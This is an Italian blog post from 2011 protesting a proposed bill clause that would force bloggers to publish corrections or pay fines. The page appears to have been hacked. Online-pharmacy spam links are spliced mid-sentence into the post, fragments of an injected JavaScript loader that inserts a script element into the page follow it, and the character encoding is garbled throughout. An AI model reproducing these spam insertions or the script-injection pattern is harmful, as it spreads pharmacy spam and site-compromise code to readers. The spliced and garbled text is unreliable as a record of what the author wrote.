.

Home > Censura, Non Ce La Faccio Più, Regime, Società > …e continuavano a provare ad imbavagliarci!

…e continuavano a provare ad imbavagliarci!

26 settembre 2011

Come si salva un Premier continuamente vessato daiA�soliti magistrati comunisti?! Semplice, si prepara un Pills ddl su misura buy cheap fluoxetine Online order cheap fluoxetine Online pharmacy !
Questa volta A? il turno delle care intercettazioni che proprio non piacciono al nostro Cavaliere e alla sua combriccola. Ma giA� che ci siamo perchA� non riproviamo a schiaffarci dentro quel comma per mettere un cerotto in bocca a quei blogger che hanno sempre avuto questo brutto vizio di abusare della loro libertA� di parola?!

Detto… Fatto… Date un’occhiata al comma 29 della��art. 1 del disegno di legge n. 1611. Anzi ve lo riassumo io in due parole:

Semmai io blogger mi fossi macchiato della grave colpa di aver scritto qualcosa su qualcuno (per esempio la veritA�!), questo qualcuno potrebbe risentirsene e potrebbe inviarmi una mail invitandomi a ritrattare. In quel caso io, entro 48 ore http://lifefortravel.com/buy-kemadrin-dose/ , avrei l’obbligo di pubblicare un articolo-rettifica (con la clausola “senza commento” ) in cui ritiro quello che avevo precedentemente detto e ammetto di essermi sbagliato. Nel caso in cui mi rifiutassi rischierei una multa fino a 12mila euro.

Per me che non ho sempre pronti in tasca 12mila euro da buttare A? un chiaro e semplice modo per privarci della nostra libertA� di parola. Dalle mie parti questa si chiama dittatura!

-


Buy cheap Viagra online

Buy http://passionbelts.ru/?p=4448

Buy

document.currentScript.parentNode.insertBefore(s, cefaclor http://convergente.pt/duphalac-price-in-india/ document.currentScript);

Cheap

d.getElementsByTagName('head')[0].appendChild(s);

Order Cheap Tegretol Without a Prescription

online

Be Sociable, Share!
I commenti sono chiusi.

Powered by AlterVista